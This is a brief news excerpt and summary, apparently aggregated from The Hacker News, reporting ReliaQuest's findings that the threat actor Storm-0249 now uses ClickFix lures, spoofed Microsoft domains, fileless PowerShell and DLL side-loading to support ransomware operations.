"The threat actor known as Storm-0249 is likely shifting from its role as an initial access broker to adopt a combination of more advanced tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. "These methods allow them to bypass defenses, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams," ReliaQuest said in a report shared with The Hacker News."
"The latest findings from ReliaQuest demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue. In this case, the command copied and executed leverages the legitimate "curl.exe" to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust ("sgcipl[.]com/us.microsoft.com/bdo/") and execute it in a fileless manner via PowerShell."
Storm-0249 is transitioning from selling initial access footholds to adopting active intrusion techniques that directly enable ransomware operations. The actor employs domain spoofing to impersonate trusted Microsoft domains and uses ClickFix social engineering to trick users into running malicious commands via the Windows Run dialog. The group executes fileless PowerShell payloads fetched using legitimate tools like curl.exe to avoid detection, then runs an MSI with SYSTEM privileges to drop trojanized DLLs via DLL side-loading. These tactics enable persistence, evade defenses, and provide ransomware gangs with pre-compromised networks for monetization.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]